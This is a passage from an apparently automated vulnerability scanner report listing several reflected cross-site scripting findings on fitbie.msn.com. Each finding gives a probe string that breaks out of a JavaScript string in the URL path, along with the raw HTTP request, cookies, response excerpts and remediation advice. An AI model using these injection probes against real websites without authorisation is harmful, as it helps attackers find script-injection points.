The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77e8d'%3b17f5c78b96d was submitted in the REST URL parameter 2. This input was echoed as 77e8d';17f5c78b96d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default77e8d'%3b17f5c78b96d/files/78376830-TH_0.jpg?1290555739 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:31 +0000
ETag: "1297607371-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:31 GMT
Date: Sun, 13 Feb 2011 14:29:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default77e8d';17f5c78b96d?destination=node%2Fdefault77e8d';17f5c78b96d&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.66. http://fitbie.msn.com/sites/default/files/78462963-TH.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/78462963-TH.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de040'%3b81b6c737b62 was submitted in the REST URL parameter 2. This input was echoed as de040';81b6c737b62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultde040'%3b81b6c737b62/files/78462963-TH.jpg?1287438041 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:32 +0000
ETag: "1297607192-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:32 GMT
Date: Sun, 13 Feb 2011 14:26:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultde040';81b6c737b62?destination=node%2Fdefaultde040';81b6c737b62&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.67. http://fitbie.msn.com/sites/default/files/80448801-TH_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/80448801-TH_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7569'%3b986424614ec was submitted in the REST URL parameter 2. This input was echoed as f7569';986424614ec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultf7569'%3b986424614ec/files/80448801-TH_0.jpg?1290557298 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:31 +0000
ETag: "1297607371-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:31 GMT
Date: Sun, 13 Feb 2011 14:29:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultf7569';986424614ec?destination=node%2Fdefaultf7569';986424614ec&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.68. http://fitbie.msn.com/sites/default/files/99812364-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/99812364-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 517fa'%3b8fd213883e7 was submitted in the REST URL parameter 2. This input was echoed as 517fa';8fd213883e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default517fa'%3b8fd213883e7/files/99812364-th.jpg?1287593544 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:31 +0000
ETag: "1297607371-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:32 GMT
Date: Sun, 13 Feb 2011 14:29:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default517fa';8fd213883e7?destination=node%2Fdefault517fa';8fd213883e7&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.69. http://fitbie.msn.com/sites/default/files/99832032-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/99832032-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4a73'%3bd37abfa21e5 was submitted in the REST URL parameter 2. This input was echoed as d4a73';d37abfa21e5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultd4a73'%3bd37abfa21e5/files/99832032-th.jpg?1287595555 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:35 +0000
ETag: "1297607375-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:35 GMT
Date: Sun, 13 Feb 2011 14:29:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultd4a73';d37abfa21e5?destination=node%2Fdefaultd4a73';d37abfa21e5&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.70. http://fitbie.msn.com/sites/default/files/MM_chinup_B-male-th_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/MM_chinup_B-male-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8120'%3b98e70ce71e7 was submitted in the REST URL parameter 2. This input was echoed as b8120';98e70ce71e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultb8120'%3b98e70ce71e7/files/MM_chinup_B-male-th_0.jpg?1287593020 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:15 +0000
ETag: "1297607175-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:15 GMT
Date: Sun, 13 Feb 2011 14:26:15 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultb8120';98e70ce71e7?destination=node%2Fdefaultb8120';98e70ce71e7&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.71. http://fitbie.msn.com/sites/default/files/MM_standard_push_A-male-th_1.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/MM_standard_push_A-male-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e92'%3b5fb1b2620c was submitted in the REST URL parameter 2. This input was echoed as 56e92';5fb1b2620c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default56e92'%3b5fb1b2620c/files/MM_standard_push_A-male-th_1.jpg?1287508674 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:30 +0000
ETag: "1297607190-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:30 GMT
Date: Sun, 13 Feb 2011 14:26:30 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default56e92';5fb1b2620c?destination=node%2Fdefault56e92';5fb1b2620c&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

